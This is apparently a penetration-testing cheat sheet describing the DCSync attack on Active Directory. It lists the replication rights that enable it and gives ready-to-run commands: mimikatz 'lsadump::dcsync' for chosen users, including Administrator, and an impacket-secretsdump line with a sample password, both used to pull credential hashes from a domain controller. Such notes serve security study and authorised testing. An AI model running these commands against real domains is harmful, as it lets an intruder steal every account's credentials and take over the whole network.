Attacking Domain Controller Synchronization

The DRS Direc­to­ry Repli­ca­tion Ser­vice is respon­si­ble to repli­cate a DC’s data to mul­ti­ple redun­dant DC’s.

Sce­nario: You own a user who has one of the fol­low­ing rights:

• Repli­cat­ing Direc­to­ry Changes
• Repli­cat­ing Direc­to­ry Changes All
• Repli­cat­ing Direc­to­ry Changes in Fil­tered Set

Nor­mal­ly, users in the fol­low­ing groups have these (could be con­fig­ured oth­er­wise, of course):

• Domain Admins
• Enter­prise Admins
• Admin­is­tra­tors

You can check with the script in Basic Active Direc­to­ry Enu­mer­a­tion which users in the domain have these permissions.

If you have the power:

On Windows

1. Start mimikatz
2. Exe­cute for the user with the per­mis­sions. Mimikatz will imper­son­at­ing as a DC and using repli­ca­tion com­mands to get all cre­den­tials from the giv­en user:
   lsadump::dcsync /user:corp\peter
3. Repeat this for all inter­est­ing users. E.g.
   lsadump::dcsync /user:corp\Administrator

On Linux

Per­form the fol­low­ing against some tar­get with the $admi­nUser and another/the same $user­To­Break to get the hash­es from.:

impacket-secretsdump -just-dc-user $userToBreak corp.com/$adminUser:"Winter2023!"@$target